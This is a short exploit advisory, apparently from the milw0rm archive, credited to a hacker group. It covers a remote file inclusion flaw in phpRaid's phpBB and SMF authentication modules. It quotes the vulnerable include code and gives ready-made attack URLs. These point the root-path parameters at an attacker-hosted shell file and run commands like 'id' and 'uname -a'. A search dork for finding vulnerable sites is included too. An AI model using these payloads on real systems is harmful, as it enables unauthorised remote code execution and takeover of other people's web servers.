# Kurdish Security Advisory # phpRaid Remote File Include [PHPBB/SMF] :} # "Sosyalizim'de .srar insan olmakta .srard.r" Abdullah Ocalan # Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & botan@linuxmail.org # Script : phpRaid # Script Website : http://www.spiffyjr.com/ # Version : phpRaid v2.9.5 " v3.0.b1 " v3.0.b2 " v3.0.b3 # Risk : High # Class : Remote # Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, And Kurdish Hackers and Security Guards :D # w0rkz : "phpRaid" "inurl:"phpRaid" etc. :) --------------------------------------------------------------------- # cmd shell example: # cmd shell variable: ($_GET[cmd]); Vulnerable code : At first for phpbb portal :) // define our auth type define("AUTH","phpbb"); // database connection global $user_group_table; $user_group_table = $phpbb_prefix . "user_group"; // setup phpBB user integration define('IN_PHPBB', true); // set this as the path to your phpBB installation include($phpbb_root_path . 'extension.inc'); include($phpbb_root_path . 'common.'.$phpEx); ----------------------------------------------------------------- http://www.site.com/[phpraidpath]/auth/auth.php?phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=id http://www.site.com/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a # SMF # // includes include($smf_root_path= . 'SSI.php'); ----------------------------------------------------------------------- http://www.site.com/[phpraidpath]/auth/auth.php?smf_root_path=http://www.yourcode.com/x.txt?&cmd=id http://www.site.com/[phpraidpath]/auth/auth_SMF/smf_root_path=http://www.yourcode.com/x.txt?&cmd=uname -a # milw0rm.com [2006-05-09]